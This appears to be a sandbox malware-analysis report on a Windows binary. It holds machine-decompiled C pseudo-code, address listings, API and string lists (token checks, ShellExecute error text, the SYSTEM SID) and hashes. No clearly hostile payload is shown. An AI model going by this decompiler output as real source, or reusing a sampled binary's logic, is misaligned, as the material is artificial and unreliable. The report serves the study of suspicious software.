                                                                                                											if(_t193 == 0) {
                                                                                                												goto L88;
                                                                                                											} else {
                                                                                                												_t333 =  *_t193;
                                                                                                												_v28 =  *((intOrPtr*)( *_t193 + 0xc))() + 0x10;
                                                                                                												_v12 = 2;
                                                                                                												_t269 =  &_v28;
                                                                                                												_t196 = E00F73FC0(_t260, _t269, _t380, _t359);
                                                                                                												__eflags = _t196;
                                                                                                												if(_t196 == 0) {
                                                                                                													__eflags = _t359;
                                                                                                													if(_t359 != 0) {
                                                                                                														_t299 = _t359;
                                                                                                														_t116 = _t299 + 2; // 0x2
                                                                                                														_t333 = _t116;
                                                                                                														do {
                                                                                                															_t196 =  *_t299;
                                                                                                															_t299 = _t299 + 2;
                                                                                                															__eflags = _t196;
                                                                                                														} while (_t196 != 0);
                                                                                                														_t300 = _t299 - _t333;
                                                                                                														__eflags = _t300;
                                                                                                														_t301 = _t300 >> 1;
                                                                                                													} else {
                                                                                                														_t301 = 0;
                                                                                                													}
                                                                                                													_t269 =  &_v28;
                                                                                                													E00F743C0(_t196, _t269, _t359, _t301);
                                                                                                												}
                                                                                                												_v12 = 3;
                                                                                                												_t366 =  *_t366;
                                                                                                												_t197 = E00F72170(_t269);
                                                                                                												__eflags = _t197;
                                                                                                												if(_t197 == 0) {
                                                                                                													goto L88;
                                                                                                												} else {
                                                                                                													_v32 =  *((intOrPtr*)( *_t197 + 0xc))() + 0x10;
                                                                                                													_v12 = 4;
                                                                                                													_t200 = E00F73FC0(_t260,  &_v32, _t380, _t366);
                                                                                                													__eflags = _t200;
                                                                                                													if(_t200 == 0) {
                                                                                                														__eflags = _t366;
                                                                                                														if(_t366 != 0) {
                                                                                                															_t295 = _t366;
                                                                                                															_t346 = _t295 + 2;
                                                                                                															do {
                                                                                                																_t200 =  *_t295;
                                                                                                																_t295 = _t295 + 2;
                                                                                                																__eflags = _t200;
                                                                                                															} while (_t200 != 0);
                                                                                                															_t296 = _t295 - _t346;
                                                                                                															__eflags = _t296;
                                                                                                															_t297 = _t296 >> 1;
                                                                                                														} else {
                                                                                                															_t297 = 0;
                                                                                                														}
                                                                                                														E00F743C0(_t200,  &_v32, _t366, _t297);
                                                                                                													}
                                                                                                													_v12 = 5;
                                                                                                													_push(_v40);
                                                                                                													_push(_v44);
                                                                                                													_push(_v48);
                                                                                                													_push(_t260);
                                                                                                													_push( &_v24);
                                                                                                													E00F75360( &_v32,  &_v28, _t359, _t366);
                                                                                                													_v12 = 3;
                                                                                                													_t370 = _t366 | 0xffffffff;
                                                                                                													_t341 = _v32 + 0xfffffff0;
                                                                                                													asm("lock xadd [edx+0xc], eax");
                                                                                                													__eflags = _t370 - 1;
                                                                                                													if(_t370 - 1 <= 0) {
                                                                                                														 *((intOrPtr*)( *((intOrPtr*)( *_t341)) + 4))(_t341);
                                                                                                													}
                                                                                                													_v12 = 1;
                                                                                                													_t343 = _v28 + 0xfffffff0;
                                                                                                													asm("lock xadd [edx+0xc], eax");
                                                                                                													__eflags = _t370 - 1;
                                                                                                													if(_t370 - 1 <= 0) {
                                                                                                														 *((intOrPtr*)( *((intOrPtr*)( *_t343)) + 4))(_t343);
                                                                                                													}
                                                                                                													_v12 = 0xffffffff;
                                                                                                													_t345 = _v24 + 0xfffffff0;
                                                                                                													asm("lock xadd [edx+0xc], esi");
                                                                                                													__eflags = _t370 - 1;
                                                                                                													if(_t370 - 1 <= 0) {
                                                                                                														 *((intOrPtr*)( *((intOrPtr*)( *_t345)) + 4))(_t345);
                                                                                                													}
                                                                                                													 *[fs:0x0] = _v20;
                                                                                                													return _v36;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t217 = E00F75810();
                                                                                                										__eflags = _t217;
                                                                                                										if(_t217 == 0) {
                                                                                                											goto L57;
                                                                                                										} else {
                                                                                                											__eflags =  *((char*)(_t366 + 0x18));
                                                                                                											if( *((char*)(_t366 + 0x18)) != 0) {
                                                                                                												goto L57;
                                                                                                											} else {
                                                                                                												__eflags = _t258;
                                                                                                												if(_t258 != 0) {
                                                                                                													goto L57;
                                                                                                												} else {
                                                                                                													_t260 =  *(_t366 + 0x1a);
                                                                                                													_t359 =  *(_t366 + 0xc);
                                                                                                													_v36 =  *(_t366 + 0x19);
                                                                                                													_t219 = E00F72170(_t269);
                                                                                                													__eflags = _t219;
                                                                                                													if(_t219 == 0) {
                                                                                                														L88:
                                                                                                														_push(0x80004005);
                                                                                                														E00F71CB0();
                                                                                                														asm("int3");
                                                                                                														asm("int3");
                                                                                                														asm("int3");
                                                                                                														_push(_t260);
                                                                                                														_push(_t366);
                                                                                                														_push(_t359);
                                                                                                														_t360 = _t269;
                                                                                                														_t261 = GetLastError();
                                                                                                														_t368 = E00F76CD0(_v160, L"Call to ShellExecute() for verb<", _t333, L"> returned:");
                                                                                                														E00F76C10(_t269, _t368, _t269, _t368);
                                                                                                														__eflags =  *_t368;
                                                                                                														while( *_t368 != 0) {
                                                                                                															_t368 =  &(_t368[0]);
                                                                                                															__eflags =  *_t368;
                                                                                                														}
                                                                                                														_t180 = 0xd;
                                                                                                														__eflags = 0xfc75cc;
                                                                                                														do {
                                                                                                															 *_t368 = _t180;
                                                                                                															_t368 =  &(_t368[0]);
                                                                                                															_t180 = _t368[0x3f1d73] & 0x0000ffff;
                                                                                                															__eflags = _t180;
                                                                                                														} while (_t180 != 0);
                                                                                                														 *_t368 = 0;
                                                                                                														_t279 = L"Last error=" - _t368;
                                                                                                														__eflags = _t279;
                                                                                                														_t182 = 0x4c;
                                                                                                														do {
                                                                                                															 *_t368 = _t182;
                                                                                                															_t368 =  &(_t368[0]);
                                                                                                															_t182 =  *(_t368 + _t279) & 0x0000ffff;
                                                                                                															__eflags = _t182;
                                                                                                														} while (_t182 != 0);
                                                                                                														 *_t368 = 0;
                                                                                                														__eflags = 0xfc75cc;
                                                                                                														_t184 = 0xd;
                                                                                                														do {
                                                                                                															 *_t368 = _t184;
                                                                                                															_t368 =  &(_t368[0]);
                                                                                                															_t184 = _t368[0x3f1d73] & 0x0000ffff;
                                                                                                															__eflags = _t184;
                                                                                                														} while (_t184 != 0);
                                                                                                														 *_t368 = 0;
                                                                                                														E00F76C10(_t261, _t368, _t360, _t368);
                                                                                                														__eflags =  *_t368;
                                                                                                														while( *_t368 != 0) {
                                                                                                															_t368 =  &(_t368[0]);
                                                                                                															__eflags =  *_t368;
                                                                                                														}
                                                                                                														_t187 = 0xd;
                                                                                                														__eflags = 0xfc75cc;
                                                                                                														do {
                                                                                                															 *_t368 = _t187;
                                                                                                															_t368 =  &(_t368[0]);
                                                                                                															_t187 = _t368[0x3f1d73] & 0x0000ffff;
                                                                                                															__eflags = _t187;
                                                                                                														} while (_t187 != 0);
                                                                                                														__eflags = 0;
                                                                                                														 *_t368 = 0;
                                                                                                														return _t368;
                                                                                                													} else {
                                                                                                														_t333 =  *_t219;
                                                                                                														_v32 =  *((intOrPtr*)( *_t219 + 0xc))() + 0x10;
                                                                                                														_v12 = 9;
                                                                                                														_t269 =  &_v32;
                                                                                                														_t222 = E00F73FC0(_t260, _t269, _t380, _t359);
                                                                                                														__eflags = _t222;
                                                                                                														if(_t222 == 0) {
                                                                                                															__eflags = _t359;
                                                                                                															if(_t359 != 0) {
                                                                                                																_t322 = _t359;
                                                                                                																_t333 = _t322 + 2;
                                                                                                																do {
                                                                                                																	_t222 =  *_t322;
                                                                                                																	_t322 = _t322 + 2;
                                                                                                																	__eflags = _t222;
                                                                                                																} while (_t222 != 0);
                                                                                                																_t323 = _t322 - _t333;
                                                                                                																__eflags = _t323;
                                                                                                																_t324 = _t323 >> 1;
                                                                                                															} else {
                                                                                                																_t324 = 0;
                                                                                                															}
                                                                                                															_t269 =  &_v32;
                                                                                                															E00F743C0(_t222, _t269, _t359, _t324);
                                                                                                														}
                                                                                                														_v12 = 0xa;
                                                                                                														_t359 =  *(_t366 + 4);
                                                                                                														_t223 = E00F72170(_t269);
                                                                                                														__eflags = _t223;
                                                                                                														if(_t223 == 0) {
                                                                                                															goto L88;
                                                                                                														} else {
                                                                                                															_t333 =  *_t223;
                                                                                                															_v28 =  *((intOrPtr*)( *_t223 + 0xc))() + 0x10;
                                                                                                															_v12 = 0xb;
                                                                                                															_t269 =  &_v28;
                                                                                                															_t226 = E00F73FC0(_t260, _t269, _t380, _t359);
                                                                                                															__eflags = _t226;
                                                                                                															if(_t226 == 0) {
                                                                                                																__eflags = _t359;
                                                                                                																if(_t359 != 0) {
                                                                                                																	_t319 = _t359;
                                                                                                																	_t70 = _t319 + 2; // 0x2
                                                                                                																	_t333 = _t70;
                                                                                                																	do {
                                                                                                																		_t226 =  *_t319;
                                                                                                																		_t319 = _t319 + 2;
                                                                                                																		__eflags = _t226;
                                                                                                																	} while (_t226 != 0);
                                                                                                																	_t320 = _t319 - _t333;
                                                                                                																	__eflags = _t320;
                                                                                                																	_t321 = _t320 >> 1;
                                                                                                																} else {
                                                                                                																	_t321 = 0;
                                                                                                																}
                                                                                                																_t269 =  &_v28;
                                                                                                																E00F743C0(_t226, _t269, _t359, _t321);
                                                                                                															}
                                                                                                															_v12 = 0xc;
                                                                                                															_t366 =  *_t366;
                                                                                                															_t227 = E00F72170(_t269);
                                                                                                															__eflags = _t227;
                                                                                                															if(_t227 == 0) {
                                                                                                																goto L88;
                                                                                                															} else {
                                                                                                																_v24 =  *((intOrPtr*)( *_t227 + 0xc))() + 0x10;
                                                                                                																_v12 = 0xd;
                                                                                                																__eflags = E00F73FC0(_t260,  &_v24, _t380, _t366);
                                                                                                																if(__eflags == 0) {
                                                                                                																	__eflags = _t366;
                                                                                                																	if(_t366 != 0) {
                                                                                                																		_t315 = _t366;
                                                                                                																		_t355 = _t315 + 2;
                                                                                                																		do {
                                                                                                																			_t230 =  *_t315;
                                                                                                																			_t315 = _t315 + 2;
                                                                                                																			__eflags = _t230;
                                                                                                																		} while (_t230 != 0);
                                                                                                																		_t316 = _t315 - _t355;
                                                                                                																		__eflags = _t316;
                                                                                                																		_t317 = _t316 >> 1;
                                                                                                																	} else {
                                                                                                																		_t317 = 0;
                                                                                                																	}
                                                                                                																	E00F743C0(_t230,  &_v24, _t366, _t317);
                                                                                                																}
                                                                                                																_v12 = 0xe;
                                                                                                																E00F74B10(_t260,  &_v24,  &_v28, _t359, _t366, __eflags,  &_v32, _v36, _t260); // executed
                                                                                                																_v12 = 0xc;
                                                                                                																_t373 = _t366 | 0xffffffff;
                                                                                                																_t350 = _v24 + 0xfffffff0;
                                                                                                																asm("lock xadd [edx+0xc], eax");
                                                                                                																__eflags = _t373 - 1;
                                                                                                																if(_t373 - 1 <= 0) {
                                                                                                																	 *((intOrPtr*)( *((intOrPtr*)( *_t350)) + 4))(_t350);
                                                                                                																}
                                                                                                																_v12 = 0xa;
                                                                                                																_t352 = _v28 + 0xfffffff0;
                                                                                                																asm("lock xadd [edx+0xc], eax");
                                                                                                																__eflags = _t373 - 1;
                                                                                                																if(_t373 - 1 <= 0) {
                                                                                                																	 *((intOrPtr*)( *((intOrPtr*)( *_t352)) + 4))(_t352);
                                                                                                																}
                                                                                                																_v12 = 0xffffffff;
                                                                                                																_t354 = _v32 + 0xfffffff0;
                                                                                                																asm("lock xadd [edx+0xc], esi");
                                                                                                																__eflags = _t373 - 1;
                                                                                                																if(_t373 - 1 <= 0) {
                                                                                                																	 *((intOrPtr*)( *((intOrPtr*)( *_t354)) + 4))(_t354);
                                                                                                																}
                                                                                                																__eflags = 0;
                                                                                                																 *[fs:0x0] = _v20;
                                                                                                																return 0;
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t247 = _t169 | 0xffffffff;
                                                                                                									__eflags = _t247;
                                                                                                									 *[fs:0x0] = _v20;
                                                                                                									return _t247; // executed
                                                                                                								}
                                                                                                							} else {
                                                                                                								goto L13;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                				} else {
                                                                                                					_t256 = 0;
                                                                                                					L16:
                                                                                                					_v8 = 0xffffffff;
                                                                                                					_t157 = _v72;
                                                                                                					_v76 = 0xfc6b50;
                                                                                                					if(_t157 != 0) {
                                                                                                						FindCloseChangeNotification(_t157); // executed
                                                                                                						_v72 = 0;
                                                                                                					}
                                                                                                					 *[fs:0x0] = _v16;
                                                                                                					return E00F80D7F(_v20 ^ _t378, _t333);
                                                                                                				}
                                                                                                			}
































































































                                                                                                0x00f773e0
                                                                                                0x00f773e0
                                                                                                0x00f773e0
                                                                                                0x00f773e1
                                                                                                0x00f773f1
                                                                                                0x00f773f4
                                                                                                0x00f773f9
                                                                                                0x00f773fb
                                                                                                0x00f77403
                                                                                                0x00f77409
                                                                                                0x00f77410
                                                                                                0x00f77417
                                                                                                0x00f77424
                                                                                                0x00f7743c
                                                                                                0x00f7744b
                                                                                                0x00f77450
                                                                                                0x00f77454
                                                                                                0x00f77457
                                                                                                0x00f7745a
                                                                                                0x00f774f6
                                                                                                0x00f774f6
                                                                                                0x00f774f6
                                                                                                0x00f77460
                                                                                                0x00f77460
                                                                                                0x00f77462
                                                                                                0x00000000
                                                                                                0x00f77468
                                                                                                0x00f7746d
                                                                                                0x00f77472
                                                                                                0x00f7747a
                                                                                                0x00f77484
                                                                                                0x00f77490
                                                                                                0x00f77497
                                                                                                0x00f7749e
                                                                                                0x00f774a2
                                                                                                0x00f774a7
                                                                                                0x00f774ae
                                                                                                0x00f774b5
                                                                                                0x00f774b8
                                                                                                0x00f774bc
                                                                                                0x00f774c0
                                                                                                0x00f774c4
                                                                                                0x00f774c7
                                                                                                0x00f774da
                                                                                                0x00f774da
                                                                                                0x00f774da
                                                                                                0x00f774c9
                                                                                                0x00f774ca
                                                                                                0x00f774cf
                                                                                                0x00f774d2
                                                                                                0x00f774d4
                                                                                                0x00000000
                                                                                                0x00f774d6
                                                                                                0x00f774d6
                                                                                                0x00f774d6
                                                                                                0x00f774d4
                                                                                                0x00f774dc
                                                                                                0x00f774e3
                                                                                                0x00f774e8
                                                                                                0x00f774ef
                                                                                                0x00f774ef
                                                                                                0x00f77462
                                                                                                0x00f774f8
                                                                                                0x00f774fc
                                                                                                0x00f774ff
                                                                                                0x00f77501
                                                                                                0x00000000
                                                                                                0x00f77503
                                                                                                0x00f77506
                                                                                                0x00f7750a
                                                                                                0x00f7750f
                                                                                                0x00f7751e
                                                                                                0x00f7751e
                                                                                                0x00f77520
                                                                                                0x00f77523
                                                                                                0x00f77523
                                                                                                0x00f77529
                                                                                                0x00f77530
                                                                                                0x00f77537
                                                                                                0x00000000
                                                                                                0x00f77511
                                                                                                0x00f77511
                                                                                                0x00f77514
                                                                                                0x00f77519
                                                                                                0x00f7751c
                                                                                                0x00f7757d
                                                                                                0x00f77582
                                                                                                0x00f77583
                                                                                                0x00f77584
                                                                                                0x00f77585
                                                                                                0x00f77586
                                                                                                0x00f77587
                                                                                                0x00f77588
                                                                                                0x00f77589
                                                                                                0x00f7758a
                                                                                                0x00f7758b
                                                                                                0x00f7758c
                                                                                                0x00f7758d
                                                                                                0x00f7758e
                                                                                                0x00f7758f
                                                                                                0x00f77590
                                                                                                0x00f77591
                                                                                                0x00f77593
                                                                                                0x00f77595
                                                                                                0x00f775a0
                                                                                                0x00f775a4
                                                                                                0x00f775a5
                                                                                                0x00f775a6
                                                                                                0x00f775a7
                                                                                                0x00f775ae
                                                                                                0x00f775af
                                                                                                0x00f775b2
                                                                                                0x00f775b8
                                                                                                0x00f775bb
                                                                                                0x00f775bd
                                                                                                0x00f775bf
                                                                                                0x00f775d6
                                                                                                0x00f775db
                                                                                                0x00f775dd
                                                                                                0x00f775e2
                                                                                                0x00f775e4
                                                                                                0x00f777ac
                                                                                                0x00f777ac
                                                                                                0x00f777b4
                                                                                                0x00f777bb
                                                                                                0x00f777be
                                                                                                0x00f777c1
                                                                                                0x00f777c3
                                                                                                0x00f777c6
                                                                                                0x00f777c9
                                                                                                0x00f777cf
                                                                                                0x00f777d2
                                                                                                0x00f777d7
                                                                                                0x00f777d9
                                                                                                0x00000000
                                                                                                0x00f777df
                                                                                                0x00f777df
                                                                                                0x00f777e9
                                                                                                0x00f777ec
                                                                                                0x00f777f3
                                                                                                0x00f777f7
                                                                                                0x00f777fc
                                                                                                0x00f777fe
                                                                                                0x00f77800
                                                                                                0x00f77802
                                                                                                0x00f77808
                                                                                                0x00f7780a
                                                                                                0x00f77810
                                                                                                0x00f77810
                                                                                                0x00f77813
                                                                                                0x00f77816
                                                                                                0x00f77816
                                                                                                0x00f7781b
                                                                                                0x00f7781b
                                                                                                0x00f7781d
                                                                                                0x00f77804
                                                                                                0x00f77804
                                                                                                0x00f77804
                                                                                                0x00f77821
                                                                                                0x00f77824
                                                                                                0x00f77824
                                                                                                0x00f77829
                                                                                                0x00f77830
                                                                                                0x00f77833
                                                                                                0x00f77838
                                                                                                0x00f7783a
                                                                                                0x00000000
                                                                                                0x00f77840
                                                                                                0x00f77840
                                                                                                0x00f7784a
                                                                                                0x00f7784d
                                                                                                0x00f77851
                                                                                                0x00f77855
                                                                                                0x00f7785a
                                                                                                0x00f7785c
                                                                                                0x00f7785e
                                                                                                0x00f77860
                                                                                                0x00f77866
                                                                                                0x00f77868
                                                                                                0x00f77868
                                                                                                0x00f77870
                                                                                                0x00f77870
                                                                                                0x00f77873
                                                                                                0x00f77876
                                                                                                0x00f77876
                                                                                                0x00f7787b
                                                                                                0x00f7787b
                                                                                                0x00f7787d
                                                                                                0x00f77862
                                                                                                0x00f77862
                                                                                                0x00f77862
                                                                                                0x00f77881
                                                                                                0x00f77884
                                                                                                0x00f77884
                                                                                                0x00f77889
                                                                                                0x00f7788d
                                                                                                0x00f7788f
                                                                                                0x00f77894
                                                                                                0x00f77896
                                                                                                0x00000000
                                                                                                0x00f7789c
                                                                                                0x00f778a6
                                                                                                0x00f778a9
                                                                                                0x00f778b1
                                                                                                0x00f778b6
                                                                                                0x00f778b8
                                                                                                0x00f778ba
                                                                                                0x00f778bc
                                                                                                0x00f778c2
                                                                                                0x00f778c4
                                                                                                0x00f778c7
                                                                                                0x00f778c7
                                                                                                0x00f778ca
                                                                                                0x00f778cd
                                                                                                0x00f778cd
                                                                                                0x00f778d2
                                                                                                0x00f778d2
                                                                                                0x00f778d4
                                                                                                0x00f778be
                                                                                                0x00f778be
                                                                                                0x00f778be
                                                                                                0x00f778db
                                                                                                0x00f778db
                                                                                                0x00f778e0
                                                                                                0x00f778e7
                                                                                                0x00f778ed
                                                                                                0x00f778f3
                                                                                                0x00f778f6
                                                                                                0x00f778f7
                                                                                                0x00f778f8
                                                                                                0x00f77900
                                                                                                0x00f77904
                                                                                                0x00f7790c
                                                                                                0x00f7790f
                                                                                                0x00f77915
                                                                                                0x00f77917
                                                                                                0x00f7791e
                                                                                                0x00f7791e
                                                                                                0x00f77921
                                                                                                0x00f7792a
                                                                                                0x00f7792d
                                                                                                0x00f77933
                                                                                                0x00f77935
                                                                                                0x00f7793c
                                                                                                0x00f7793c
                                                                                                0x00f7793f
                                                                                                0x00f77949
                                                                                                0x00f7794c
                                                                                                0x00f77952
                                                                                                0x00f77954
                                                                                                0x00f7795b
                                                                                                0x00f7795b
                                                                                                0x00f77964
                                                                                                0x00f77972
                                                                                                0x00f77972
                                                                                                0x00f77896
                                                                                                0x00f7783a
                                                                                                0x00f775ea
                                                                                                0x00f775ea
                                                                                                0x00f775ef
                                                                                                0x00f775f1
                                                                                                0x00000000
                                                                                                0x00f775f7
                                                                                                0x00f775f7
                                                                                                0x00f775fb
                                                                                                0x00000000
                                                                                                0x00f77601
                                                                                                0x00f77601
                                                                                                0x00f77603
                                                                                                0x00000000
                                                                                                0x00f77609
                                                                                                0x00f7760c
                                                                                                0x00f7760f
                                                                                                0x00f77612
                                                                                                0x00f77615
                                                                                                0x00f7761a
                                                                                                0x00f7761c
                                                                                                0x00f77973
                                                                                                0x00f77973
                                                                                                0x00f77978
                                                                                                0x00f7797d
                                                                                                0x00f7797e
                                                                                                0x00f7797f
                                                                                                0x00f77980
                                                                                                0x00f77981
                                                                                                0x00f77982
                                                                                                0x00f77985
                                                                                                0x00f7799c
                                                                                                0x00f779a6
                                                                                                0x00f779ac
                                                                                                0x00f779b1
                                                                                                0x00f779b5
                                                                                                0x00f779b7
                                                                                                0x00f779ba
                                                                                                0x00f779ba
                                                                                                0x00f779c5
                                                                                                0x00f779ca
                                                                                                0x00f779d0
                                                                                                0x00f779d0
                                                                                                0x00f779d3
                                                                                                0x00f779d6
                                                                                                0x00f779da
                                                                                                0x00f779da
                                                                                                0x00f779e6
                                                                                                0x00f779e9
                                                                                                0x00f779e9
                                                                                                0x00f779eb
                                                                                                0x00f779f0
                                                                                                0x00f779f0
                                                                                                0x00f779f3
                                                                                                0x00f779f6
                                                                                                0x00f779fa
                                                                                                0x00f779fa
                                                                                                0x00f77a06
                                                                                                0x00f77a09
                                                                                                0x00f77a0b
                                                                                                0x00f77a10
                                                                                                0x00f77a10
                                                                                                0x00f77a13
                                                                                                0x00f77a16
                                                                                                0x00f77a1a
                                                                                                0x00f77a1a
                                                                                                0x00f77a25
                                                                                                0x00f77a28
                                                                                                0x00f77a2d
                                                                                                0x00f77a31
                                                                                                0x00f77a33
                                                                                                0x00f77a36
                                                                                                0x00f77a36
                                                                                                0x00f77a41
                                                                                                0x00f77a46
                                                                                                0x00f77a50
                                                                                                0x00f77a50
                                                                                                0x00f77a53
                                                                                                0x00f77a56
                                                                                                0x00f77a5a
                                                                                                0x00f77a5a
                                                                                                0x00f77a5f
                                                                                                0x00f77a61
                                                                                                0x00f77a69
                                                                                                0x00f77622
                                                                                                0x00f77622
                                                                                                0x00f7762c
                                                                                                0x00f7762f
                                                                                                0x00f77636
                                                                                                0x00f7763a
                                                                                                0x00f7763f
                                                                                                0x00f77641
                                                                                                0x00f77643
                                                                                                0x00f77645
                                                                                                0x00f7764b
                                                                                                0x00f7764d
                                                                                                0x00f77650
                                                                                                0x00f77650
                                                                                                0x00f77653
                                                                                                0x00f77656
                                                                                                0x00f77656
                                                                                                0x00f7765b
                                                                                                0x00f7765b
                                                                                                0x00f7765d
                                                                                                0x00f77647
                                                                                                0x00f77647
                                                                                                0x00f77647
                                                                                                0x00f77661
                                                                                                0x00f77664
                                                                                                0x00f77664
                                                                                                0x00f77669
                                                                                                0x00f77670
                                                                                                0x00f77673
                                                                                                0x00f77678
                                                                                                0x00f7767a
                                                                                                0x00000000
                                                                                                0x00f77680
                                                                                                0x00f77680
                                                                                                0x00f7768a
                                                                                                0x00f7768d
                                                                                                0x00f77691
                                                                                                0x00f77695
                                                                                                0x00f7769a
                                                                                                0x00f7769c
                                                                                                0x00f7769e
                                                                                                0x00f776a0
                                                                                                0x00f776a6
                                                                                                0x00f776a8
                                                                                                0x00f776a8
                                                                                                0x00f776b0
                                                                                                0x00f776b0
                                                                                                0x00f776b3
                                                                                                0x00f776b6
                                                                                                0x00f776b6
                                                                                                0x00f776bb
                                                                                                0x00f776bb
                                                                                                0x00f776bd
                                                                                                0x00f776a2
                                                                                                0x00f776a2
                                                                                                0x00f776a2
                                                                                                0x00f776c1
                                                                                                0x00f776c4
                                                                                                0x00f776c4
                                                                                                0x00f776c9
                                                                                                0x00f776cd
                                                                                                0x00f776cf
                                                                                                0x00f776d4
                                                                                                0x00f776d6
                                                                                                0x00000000
                                                                                                0x00f776dc
                                                                                                0x00f776e6
                                                                                                0x00f776e9
                                                                                                0x00f776f6
                                                                                                0x00f776f8
                                                                                                0x00f776fa
                                                                                                0x00f776fc
                                                                                                0x00f77702
                                                                                                0x00f77704
                                                                                                0x00f77707
                                                                                                0x00f77707
                                                                                                0x00f7770a
                                                                                                0x00f7770d
                                                                                                0x00f7770d
                                                                                                0x00f77712
                                                                                                0x00f77712
                                                                                                0x00f77714
                                                                                                0x00f776fe
                                                                                                0x00f776fe
                                                                                                0x00f776fe
                                                                                                0x00f7771b
                                                                                                0x00f7771b
                                                                                                0x00f77720
                                                                                                0x00f77732
                                                                                                0x00f7773a
                                                                                                0x00f7773e
                                                                                                0x00f77746
                                                                                                0x00f77749
                                                                                                0x00f7774f
                                                                                                0x00f77751
                                                                                                0x00f77758
                                                                                                0x00f77758
                                                                                                0x00f7775b
                                                                                                0x00f77764
                                                                                                0x00f77767
                                                                                                0x00f7776d
                                                                                                0x00f7776f
                                                                                                0x00f77776
                                                                                                0x00f77776
                                                                                                0x00f77779
                                                                                                0x00f77783
                                                                                                0x00f77786
                                                                                                0x00f7778c
                                                                                                0x00f7778e
                                                                                                0x00f77795
                                                                                                0x00f77795
                                                                                                0x00f77798
                                                                                                0x00f7779d
                                                                                                0x00f777ab
                                                                                                0x00f777ab
                                                                                                0x00f776d6
                                                                                                0x00f7767a
                                                                                                0x00f7761c
                                                                                                0x00f77603
                                                                                                0x00f775fb
                                                                                                0x00f775f1
                                                                                                0x00f775c1
                                                                                                0x00f775c1
                                                                                                0x00f775c1
                                                                                                0x00f775c7
                                                                                                0x00f775d5
                                                                                                0x00f775d5
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00f7751c
                                                                                                0x00f7750f
                                                                                                0x00f7743e
                                                                                                0x00f7743e
                                                                                                0x00f7753e
                                                                                                0x00f7753e
                                                                                                0x00f77545
                                                                                                0x00f77548
                                                                                                0x00f77551
                                                                                                0x00f77554
                                                                                                0x00f7755a
                                                                                                0x00f7755a
                                                                                                0x00f77566
                                                                                                0x00f7757c
                                                                                                0x00f7757c

                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32 ref: 00F77427
                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00F77434
                                                                                                • LocalFree.KERNEL32(?), ref: 00F77523
                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00F77554
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Process$ChangeCloseCurrentFindFreeLocalNotificationOpenToken
                                                                                                • String ID: > returned:$Call to ShellExecute() for verb<$Last error=$S-1-5-18
                                                                                                • API String ID: 3427585885-251169883
                                                                                                • Opcode ID: 39224bb54a656cdf962279453b7e235a24f7f3e1191d947b4348d487173af434
                                                                                                • Instruction ID: 89c8e3dcb9ab83cd1e8218b8417302068d2a0f59595846ced3464378894fd4f2
                                                                                                • Opcode Fuzzy Hash: 39224bb54a656cdf962279453b7e235a24f7f3e1191d947b4348d487173af434
                                                                                                • Instruction Fuzzy Hash: 9322F431E04305CBDB14EFA8C945BAEB7B1EF44314F24C65ED84A9B291EB349D05EB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 99%
                                                                                                			E00F76550(void* __ebx, void* __edi, void* __esi) {
                                                                                                				signed int _t96;
                                                                                                				char _t97;
                                                                                                				long _t102;
                                                                                                				void* _t103;
                                                                                                				long _t108;
                                                                                                				long _t111;
                                                                                                				char* _t112;
                                                                                                				intOrPtr _t114;
                                                                                                				signed int _t115;
                                                                                                				signed int _t116;
                                                                                                				signed int _t117;
                                                                                                				signed int _t118;
                                                                                                				signed int _t119;
                                                                                                				signed int _t120;
                                                                                                				signed int _t121;
                                                                                                				signed int _t122;
                                                                                                				signed int _t123;
                                                                                                				signed int _t124;
                                                                                                				signed int _t125;
                                                                                                				signed int _t126;
                                                                                                				signed int _t127;
                                                                                                				signed int _t128;
                                                                                                				char* _t130;
                                                                                                				signed short _t131;
                                                                                                				void* _t133;
                                                                                                				void* _t134;
                                                                                                				short _t135;
                                                                                                				char _t136;
                                                                                                				signed short _t140;
                                                                                                				signed int _t146;
                                                                                                				signed int _t147;
                                                                                                				signed int _t148;
                                                                                                				signed int _t149;
                                                                                                				signed int _t150;
                                                                                                				signed int _t151;
                                                                                                				signed int _t152;
                                                                                                				signed int _t153;
                                                                                                				signed int _t154;
                                                                                                				signed int _t155;
                                                                                                				signed int _t156;
                                                                                                				signed int _t157;
                                                                                                				signed int _t158;
                                                                                                				signed int _t159;
                                                                                                				signed int _t160;
                                                                                                				signed int _t161;
                                                                                                				signed int _t162;
                                                                                                				signed int _t163;
                                                                                                				intOrPtr _t165;
                                                                                                				void* _t167;
                                                                                                				void* _t169;
                                                                                                				void* _t171;
                                                                                                				void* _t173;
                                                                                                				void* _t175;
                                                                                                				void* _t177;
                                                                                                				void* _t179;
                                                                                                				signed short* _t180;
                                                                                                				signed short* _t181;
                                                                                                				signed short* _t182;
                                                                                                				signed short* _t183;
                                                                                                				signed short* _t184;
                                                                                                				char* _t188;
                                                                                                				signed short* _t189;
                                                                                                				void* _t195;
                                                                                                				signed int _t197;
                                                                                                				signed int _t199;
                                                                                                				signed int _t201;
                                                                                                				signed int _t203;
                                                                                                				signed int _t205;
                                                                                                				signed int _t207;
                                                                                                				signed int _t209;
                                                                                                				signed int _t211;
                                                                                                				signed int _t213;
                                                                                                				signed int _t215;
                                                                                                				signed int _t217;
                                                                                                				signed int _t219;
                                                                                                				char* _t220;
                                                                                                				void* _t221;
                                                                                                				void* _t227;
                                                                                                				void* _t235;
                                                                                                
                                                                                                				_t220 = _t221 - 0xa0c;
                                                                                                				_t96 =  *0xfcf00c; // 0xfd8fa683
